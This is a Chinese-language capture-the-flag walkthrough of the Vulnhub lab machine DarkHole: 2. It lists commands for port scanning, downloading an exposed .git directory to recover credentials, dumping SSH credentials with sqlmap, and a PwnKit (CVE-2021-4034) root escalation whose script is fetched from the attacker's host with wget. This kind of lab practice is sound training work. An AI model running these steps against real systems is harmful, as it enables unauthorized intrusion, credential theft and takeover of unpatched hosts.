【Vulnhub靶场】DARKHOLE: 2
找到靶机ip
arp-scan -l靶机ip为:192.168.86.133
nmap 扫描
nmap -A -p 1-65535 192.168.86.13322 ssh端口 和80tcp端口开着
访问网站 192.168.86.133
有个login,需要账号密码
dirsearch 扫描网页目录
发现存在git泄露
克隆到本地,我克隆到桌面,
wget -r http://192.168.86.133/.git/切换目录
cd /home/kali/Desktop/192.168.86.133查看全部提交记录
git log --oneline
可以看到第二排增加默认许可在php文件里,读取php代码
git show a4d900
账号 :lush@admin.com
密码:321
登录网站
注意看id =1 觉得存在注入点,抓包试一下,发现成功。
用bp抓这个网页的数据包,不会的问ai吧。
sqlmap -r 1.txt --dbs sqlmap -r 1.txt -D darkhole_2 --tables sqlmap -r 1.txt -D darkhole_2 -T ssh --column sqlmap -r 1.txt -D darkhole_2 -T ssh -C user,id,pass --dump得到ssh账号密码:
账号:jehad
密码:fool
登录ssh
ssh jehad@192.168.86.133
我用的方法跟网上不一样,直接讲方法了。
查找sudi权限的文件
find / -perm -4000 -type f 2>/dev/null
发现polkit,使用pokit提权
使用的是cve2021-4034.py,github上有
python -m http.server 8082 kali上建立http连接
cd /tmp 进入靶机tmp目录
wget http://192.168.86.128:8082/cve2021-4034.py 通过wget 传输cve2021-4034.py文件。
python3 cve2021-4034.py 执行文件
拿到root权限 得到flag
还有一个flag在普通用户权限里
